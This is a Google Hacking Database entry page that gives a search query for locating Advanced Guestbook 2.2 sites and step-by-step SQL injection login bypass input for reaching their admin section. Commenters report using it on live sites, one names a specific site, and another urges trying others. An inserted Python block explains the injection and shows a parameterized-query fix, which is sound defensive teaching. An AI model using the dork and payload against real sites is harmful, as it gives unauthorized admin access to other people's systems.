GHDB « Hackers For Charity

GHDB


Google Search: intitle:guestbook “advanced guestbook 2.2 powered”

ThrowedOff rates this entry 6 out of 10.
Submitted: 2004-05-12 00:00:00
Added by: ThrowedOff
Hits: 10749
Score: 6

Advanced Guestbook v2.2 has an SQL injection problem which allows unauthorized access. Attacker

From there, hit “Admin” then do the following:

Leave username field blank.
For password, enter this exactly: ’) OR (‘a’ = ‘a

You are now in the Guestbook’s Admin section.

http://www.securityfocus.com/bid/10209
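Why the password string in the entry above has that shape, and how parameter binding closes the hole, as an added example (not Advanced Guestbook's own code). It assumes the login query concatenates input into `password = PASSWORD('...')`; the table name, function names and the SQLite stand-in for `PASSWORD()` are hypothetical, and the typographic quotes from the page are normalized to plain ones.

```python
import hashlib
import sqlite3


def _password(value):
    # Hypothetical stand-in for a SQL-side hash function such as PASSWORD().
    return hashlib.sha256(value.encode()).hexdigest()


def make_db():
    # Constructed sample data: one admin row in an in-memory database.
    db = sqlite3.connect(":memory:")
    db.create_function("PASSWORD", 1, _password)
    db.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    db.execute("INSERT INTO admins VALUES (?, PASSWORD(?))",
               ("admin", "constructed-secret"))
    return db


def login_concatenated(db, username, password):
    # Assumed vulnerable pattern: user input becomes part of the SQL text.
    # A quote in the input ends the string literal, ")" ends the function
    # call, and the trailing "OR (...)" is parsed as SQL. Because AND binds
    # tighter than OR, the whole WHERE clause becomes true for every row.
    sql = ("SELECT username FROM admins WHERE username = '" + username +
           "' AND password = PASSWORD('" + password + "')")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, username, password):
    # Hardened form: placeholders keep input as data, never as SQL syntax.
    sql = ("SELECT username FROM admins "
           "WHERE username = ? AND password = PASSWORD(?)")
    return db.execute(sql, (username, password)).fetchone() is not None


# The password value from the entry, with plain quotes.
PAGE_INPUT = "') OR ('a' = 'a"

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", login_concatenated(db, "", PAGE_INPUT))
    print("parameterized:", login_parameterized(db, "", PAGE_INPUT))
```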


Comments:

2004-05-27 18:29:44 (Anonymous): I’m quite amazed that such a simple SQL injection still works on so many sites nowadays. It will work with just about /every/ result that Google pulls up.

2004-05-30 09:53:12 (Fr0zen): This works perfectly, but I see I was not the first who has already tried it :)

2004-12-25 10:51:00 (vinny): Yeah, sorry, but I’m a noob and it’s maybe stupid,
but it’s not working for me.
What am I doing wrong?

I search in Google, then for example:
http://benjaminroldan.com/forum/admin.php
then I leave the username empty
and for the password I fill in: ‘) OR (‘a’ = ‘a (between the //).

And I get an error: Access Denied?
Or SQL Error?

What am I doing wrong?
PS: Sorry for my bad English


2005-08-18 20:43:18 (JTR000): That one site was secured against it.
Try others.



5 Responses to “GHDB”

  1. Jack says:

    Does the GHDB still get updated now?

  2. Johnny says:

    The GHDB is alive and well, updated through the ExploitDB: http://www.exploit-db.com/google-dorks.

  3. The Artist says:

    Hi Johnny, it’s been a while since I last came by. Aren’t you gonna update this website anymore?

  4. Johnny says:

    The GHDB is not updated and lives with the exploitdb: http://www.exploit-db.com. Please check out the awesome folks at Offensive Security as well: http://www.offensive-security.com!

  5. Velmurugan says:

    Are any offline viewable resources available for this product?
